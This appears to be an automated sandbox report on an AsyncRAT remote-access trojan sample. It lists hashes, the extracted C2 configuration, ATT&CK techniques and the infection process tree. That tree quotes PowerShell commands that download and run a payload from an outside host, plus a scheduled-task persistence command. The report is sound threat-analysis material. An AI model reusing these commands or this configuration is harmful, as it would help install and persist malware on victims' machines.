asyncrat | cf4ff6cb9038c130e7b6d76daf2af62d018541c3d561d5e0aba8a34614ebc5d8

General

Target

Order._1.exe
Size

288KB
MD5

587be0c9be93274c3d38ef27c3a50aa4
SHA1

6808c0da1276c7ad2021ffb7c0b8d743f5c87b35
SHA256

cf4ff6cb9038c130e7b6d76daf2af62d018541c3d561d5e0aba8a34614ebc5d8
SHA512

5d2dbadb93ae2d91c3e7af58be9b28a7270a86b1c3b2bfbae64f232a06f26efa72162dc4adb22ce1f269429eecb2d4b5b44e1c1494658de702c1f2dad0c9c879
SSDEEP

3072:Cq6+ouCpk2mpcWJ0r+QNTBf2Wk1qXkXRA4XTZ5N:Cldk1cWQRNTB+l8KN

Score

10^/10

asyncrat default discovery execution persistence rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

192.228.105.2:7707

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
true
install_file
svchst.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/memory/400-43-0x00000000052A0000-0x00000000052B2000-memory.dmp	family_asyncrat
behavioral2/memory/3488-56-0x00000000014D0000-0x00000000014E2000-memory.dmp	family_asyncrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
6	448	powershell.exe
16	3152	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
448	powershell.exe
3152	powershell.exe

Downloads MZ/PE file

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/files/0x0004000000022a99-33.dat	net_reactor
behavioral2/memory/400-35-0x0000000000900000-0x0000000000968000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation	Order._1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation	CoinAIfdp.exe

Executes dropped EXE 2 IoCs

pid	Process
400	CoinAIfdp.exe
3488	svchst.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoinAi.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CoinAIfdp.exe"	CoinAIfdp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoinAi.exe = "C:\\Users\\Admin\\AppData\\Roaming\\svchst.exe"	svchst.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Order._1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CoinAIfdp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1092	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4972	schtasks.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
448	powershell.exe
448	powershell.exe
3152	powershell.exe
3152	powershell.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe
400	CoinAIfdp.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	448	powershell.exe
Token: SeDebugPrivilege	3152	powershell.exe
Token: SeDebugPrivilege	400	CoinAIfdp.exe
Token: SeDebugPrivilege	3488	svchst.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2928 wrote to memory of 1132	2928	Order._1.exe	84
PID 2928 wrote to memory of 1132	2928	Order._1.exe	84
PID 1132 wrote to memory of 448	1132	cmd.exe	87
PID 1132 wrote to memory of 448	1132	cmd.exe	87
PID 1132 wrote to memory of 3152	1132	cmd.exe	93
PID 1132 wrote to memory of 3152	1132	cmd.exe	93
PID 1132 wrote to memory of 400	1132	cmd.exe	96
PID 1132 wrote to memory of 400	1132	cmd.exe	96
PID 1132 wrote to memory of 400	1132	cmd.exe	96
PID 400 wrote to memory of 3732	400	CoinAIfdp.exe	104
PID 400 wrote to memory of 3732	400	CoinAIfdp.exe	104
PID 400 wrote to memory of 3732	400	CoinAIfdp.exe	104
PID 400 wrote to memory of 2908	400	CoinAIfdp.exe	105
PID 400 wrote to memory of 2908	400	CoinAIfdp.exe	105
PID 400 wrote to memory of 2908	400	CoinAIfdp.exe	105
PID 3732 wrote to memory of 4972	3732	cmd.exe	108
PID 3732 wrote to memory of 4972	3732	cmd.exe	108
PID 3732 wrote to memory of 4972	3732	cmd.exe	108
PID 2908 wrote to memory of 1092	2908	cmd.exe	109
PID 2908 wrote to memory of 1092	2908	cmd.exe	109
PID 2908 wrote to memory of 1092	2908	cmd.exe	109
PID 2908 wrote to memory of 3488	2908	cmd.exe	110
PID 2908 wrote to memory of 3488	2908	cmd.exe	110
PID 2908 wrote to memory of 3488	2908	cmd.exe	110

C:\Users\Admin\AppData\Local\Temp\Order._1.exe
"C:\Users\Admin\AppData\Local\Temp\Order._1.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2928
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AA59.tmp\AA5A.tmp\AA5B.bat C:\Users\Admin\AppData\Local\Temp\Order._1.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1132
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:448
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3152
- - C:\Users\Admin\AppData\Local\Temp\CoinAIfdp.exe
    CoinAIfdp.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:400
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\Admin\AppData\Roaming\svchst.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3732
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\Admin\AppData\Roaming\svchst.exe"'
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4972
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC213.tmp.bat""
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2908
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1092
    - - C:\Users\Admin\AppData\Roaming\svchst.exe
        
        "C:\Users\Admin\AppData\Roaming\svchst.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3488

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6c4805e00673bef922d51b1a7137028f

SHA1
0eabb38482d1733dd85a2af9c5342c2cafcd41eb

SHA256
7af7d25fe7e3bb8b75bcffaa8573e2e9af7e7f70a840fa8bc0196d0ab396ecdd

SHA512
eb6dacb4e0da6f45028ebf65ebffdc6aecdb6a34a582bb69aa5836ef02a7115f6b500ef2dd6a2c2be994ec9d0cbbff564368724593666105d3d4475441830cc1

Download Submit
C:\Users\Admin\AppData\Local\Temp\AA59.tmp\AA5A.tmp\AA5B.bat

Filesize
336B

MD5
01c5cda0bd57d42a84beff225913c7f6

SHA1
1047c8ce097c87214b5337c98278f4ce5a5896f7

SHA256
454734ff80f0ff62344d6adeaf700983b1d5da605d192226e3a1e40020ec0d31

SHA512
76af6d488d7fdf8d701d16e0c884811df4c7a7bf34b74c30f7e993490420ebb895889048ae9ec5ca82d037f49de42028fca751d66915df543cd4394fcff727b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\CoinAIfdp.exe

Filesize
393KB

MD5
1b3e4783a56a59a811cbd437c6c34a18

SHA1
1c3c098d76f93570c6f72a815ee1e257da9e2a7f

SHA256
b92d49db7714fcadcfa107dbc3a37a12fa30e4aadebd1eb1d551ccfe61f638de

SHA512
c7ab45b5376677ce3484b2d575304fe23a38eb1491245d899e57c6491c999704318d6f5bf5b2fa560692bf52c531c4445f999e95269a1443323fccb73ac58e38

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bxq4atny.1mb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpC213.tmp.bat

Filesize
150B

MD5
a7708aeea5dbb82ba2e455d2845931bb

SHA1
6cd5fa0b4693dce3e0f351288519a72940fccb9d

SHA256
e491921a821075348aab9844fb10218daeac785f6eb859e65d7ce9e5ecb9fe56

SHA512
328defc005cf5a7bbfd1b8d39db6e191c8b8411b2b3569824f0d8be91ee2c5235d98768e13b121a0fe0fac3097304128b23c746cb9ee39a46d6269dec46d6ff7

Download Submit
C:\Users\Admin\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458

Filesize
75KB

MD5
834cfe4c91e1aa48057f85f67999adc8

SHA1
2803f3605af8f9c1f34011060b1413792e57c258

SHA256
7e7039d296a5e761e4e8950966a05311d8b52055e31178eaa0b22e6aec51d85f

SHA512
0fef2021ac2e0eced4914ad022438caf116c2e93074fd36a498229094246bd29a320ba9d1b112f6994e7ab3a268e6a95371844ba78202afd45752ce4fc0dcd1c

Download Submit
memory/400-43-0x00000000052A0000-0x00000000052B2000-memory.dmp

Filesize
72KB

Download
memory/400-35-0x0000000000900000-0x0000000000968000-memory.dmp

Filesize
416KB

Download
memory/400-42-0x0000000005340000-0x0000000005353000-memory.dmp

Filesize
76KB

Download
memory/400-44-0x0000000005FF0000-0x000000000608C000-memory.dmp

Filesize
624KB

Download
memory/448-18-0x00007FFE6FBC0000-0x00007FFE70681000-memory.dmp

Filesize
10.8MB

Download
memory/448-14-0x00007FFE6FBC0000-0x00007FFE70681000-memory.dmp

Filesize
10.8MB

Download
memory/448-13-0x00007FFE6FBC0000-0x00007FFE70681000-memory.dmp

Filesize
10.8MB

Download
memory/448-8-0x0000020565040000-0x0000020565062000-memory.dmp

Filesize
136KB

Download
memory/448-2-0x00007FFE6FBC3000-0x00007FFE6FBC5000-memory.dmp

Filesize
8KB

Download
memory/3488-56-0x00000000014D0000-0x00000000014E2000-memory.dmp

Filesize
72KB

Download
memory/3488-57-0x00000000064A0000-0x0000000006A44000-memory.dmp

Filesize
5.6MB

Download
memory/3488-58-0x0000000005EF0000-0x0000000005F56000-memory.dmp

Filesize
408KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads